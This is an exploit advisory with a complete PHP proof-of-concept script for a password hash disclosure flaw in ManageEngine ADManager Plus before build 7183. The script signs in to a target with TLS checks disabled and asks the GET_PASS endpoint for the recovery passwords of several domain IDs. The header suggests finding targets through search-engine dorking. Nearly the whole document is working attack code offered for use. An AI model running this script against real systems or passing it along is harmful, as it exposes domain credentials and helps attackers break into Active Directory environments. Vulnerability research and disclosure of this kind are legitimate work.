ManageEngine ADManager version 7183 suffers from a password hash disclosure vulnerability.
=============================================================================================================================================
| # Title : ManageEngine ADManager 7183 Password Hash Disclosure Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.manageengine.com/products/ad-manager/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] ManageEngine ADManager Plus versions prior to build 7183 suffers from a Password Hash disclosure vulnerability..
[+] save code as poc.php .
[+] USage : php poc.php -t <target_url> -a <auth> -u <username> -p <password>
[+] PayLoad :
<?php
// تعطيل تحذيرات HTTPS
error_reporting(0);
function getPass($target, $auth, $user, $password) {
// تهيئة Session
$ch = curl_init();
// تحويل نوع المصادقة إذا كان ADManager
if (strtolower($auth) == 'admanager') {
$auth = 'ADManager Plus Authentication';
}
// بيانات تسجيل الدخول
$data = http_build_query([
"is_admp_pass_encrypted" => "false",
"j_username" => $user,
"j_password" => $password,
"domainName" => $auth,
"AUTHRULE_NAME" => "ADAuthenticator"
]);
// إعدادات الطلب
$url = $target . 'j_security_check?LogoutFromSSO=true';
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
"User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",
"Content-Type: application/x-www-form-urlencoded"
]);
// إرسال الطلب
$response = curl_exec($ch);
// التحقق من المصادقة
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if (strpos($response, 'Cookie') !== false) {
echo "[+] Authentication successful!n";
} elseif ($http_code == 200) {
echo "[-] Invalid login name/password!n";
exit(0);
} else {
echo "[-] Something went wrong!n";
exit(1);
}
// استرجاع كلمة المرور
for ($i = 1; $i <= 5; $i++) {
echo "[*] Trying to fetch recovery password for domainId: $i!n";
$passUrl = $target . 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' . $i . '%22%7D';
curl_setopt($ch, CURLOPT_URL, $passUrl);
curl_setopt($ch, CURLOPT_POST, false);
$passResponse = curl_exec($ch);
if ($passResponse) {
echo $passResponse . "n";
}
}
curl_close($ch);
}
function get_args() {
global $argv;
$args = [
'target' => '',
'auth' => '',
'user' => '',
'password' => ''
];
for ($i = 1; $i < count($argv); $i++) {
switch ($argv[$i]) {
case '-t':
case '--target':
$args['target'] = $argv[++$i];
break;
case '-a':
case '--auth':
$args['auth'] = $argv[++$i];
break;
case '-u':
case '--user':
$args['user'] = $argv[++$i];
break;
case '-p':
case '--password':
$args['password'] = $argv[++$i];
break;
}
}
return $args;
}
function main() {
$args = get_args();
if (!$args['target'] || !$args['auth'] || !$args['user'] || !$args['password']) {
echo "Usage: php exploit.php -t <target_url> -a <auth> -u <username> -p <password>n";
exit(1);
}
getPass($args['target'], $args['auth'], $args['user'], $args['password']);
}
main();
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================